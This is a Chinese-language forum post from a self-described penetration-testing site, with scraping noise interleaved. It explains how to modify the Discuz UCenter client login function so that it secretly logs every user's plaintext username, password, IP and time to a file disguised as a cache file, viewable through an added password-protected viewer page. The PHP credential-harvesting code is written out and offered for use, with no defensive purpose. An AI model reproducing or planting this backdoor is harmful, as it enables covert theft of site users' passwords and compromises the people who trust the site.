中国网络渗透测试联盟
标题:
dz1.5记录用户名和密码
[打印本页]
作者:
admin
时间:
2013-2-27 21:40
标题:
dz1.5记录用户名和密码
修改uc_client目录下的client.php 在
& i. a& s2 ?# _0 ~ N
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
5 p/ Z9 u' @: q. J$ l6 E8 U! c* {
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
/ E6 E: @9 w3 i3 q: F& d/ Z
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
* B7 `* p3 _/ C% `
if(getenv('HTTP_CLIENT_IP')) {
' c* W$ u4 `* |* P+ O- h) [
$onlineip = getenv('HTTP_CLIENT_IP');
, ?3 d7 M" O+ v1 S
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
" O2 _/ W( ]( k
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
; ^4 m& U% t( n" b
} elseif(getenv('REMOTE_ADDR')) {
& n4 A5 r, Z. t6 i+ z2 l0 j
$onlineip = getenv('REMOTE_ADDR');
- K; J' c8 j' T% }8 j
} else {
3 M6 {$ {+ g$ j" T
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
" P; l( q5 S+ X, [! E8 I" J
}
/ t( V. N p3 f: \
$showtime=date("Y-m-d H:i:s");
9 p, m) Q" i# O& B; M/ G
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
( l& w5 u: c5 F6 O; P( z' n
$handle=fopen('./data/cache/csslog.php','a+');
9 I Y+ m/ ^+ p. |7 P- a- O
$write=fwrite($handle,$record);
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2